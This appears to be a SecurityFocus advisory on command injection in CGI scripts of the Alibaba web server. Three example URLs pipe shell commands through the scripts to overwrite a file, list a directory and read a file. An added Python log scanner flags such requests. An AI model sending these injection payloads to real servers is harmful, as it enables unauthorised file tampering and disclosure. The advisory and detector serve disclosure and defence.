
Alibaba Multiple CGI Vulnerabilities

http ://victim.com/cgi-bin/get32.exe|echo%20>c:\file.txt
This will overwrite file.txt, or any file you specify. The get32.exe program will also allow the injection of code bytes into any executable file.

http ://www.victim.com/cgi-bin/alibaba.pl|dir
This will provide a directory listing of the CGI directory.

http ://www.victim.com/cgi-bin/tst.bat|type%20c:\file.txt
This will display the contents of file.txt.
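
A defender-side check for the request pattern shown above, as an added example that is not part of the original advisory: it scans access-log lines for /cgi-bin/ requests whose script path contains a pipe or other shell metacharacter, raw or percent-encoded. The Common Log Format layout, the sample lines (constructed from the URLs above) and the function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Request field of a Common Log Format line: "METHOD target [PROTOCOL]"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"')
# Shell metacharacters that should never appear in a CGI script path
META = set("|&;<>`")

def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so %7C and double-encoded %257C both become '|'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def flag_cgi_injection(line):
    """Return the decoded path if a /cgi-bin/ request path holds a metacharacter, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Drop the query string first: '&' is legitimate there, not in the script path.
    path = decode_fully(m.group("target").split("?", 1)[0])
    if not path.lower().startswith("/cgi-bin/"):
        return None
    return path if META & set(path[len("/cgi-bin/"):]) else None

def scan(lines):
    """Return (line_number, decoded_path) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        path = flag_cgi_injection(line)
        if path is not None:
            hits.append((number, path))
    return hits

# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /cgi-bin/tst.bat|type%20c:\file.txt HTTP/1.0" 200 120',
    r'192.0.2.10 - - [01/Jan/2000:10:00:05 +0000] "GET /cgi-bin/alibaba.pl%7Cdir HTTP/1.0" 200 512',
    r'192.0.2.10 - - [01/Jan/2000:10:00:09 +0000] "GET /cgi-bin/alibaba.pl%257Cdir HTTP/1.0" 200 512',
    r'192.0.2.11 - - [01/Jan/2000:10:01:00 +0000] "GET /cgi-bin/search.pl?q=a&b=c HTTP/1.0" 200 300',
    r'192.0.2.12 - - [01/Jan/2000:10:02:00 +0000] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious CGI request path {path!r}")
```

The same metacharacter test can be applied at the server or a reverse proxy to reject such requests before they reach a CGI handler.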







 

Copyright 2009, SecurityFocus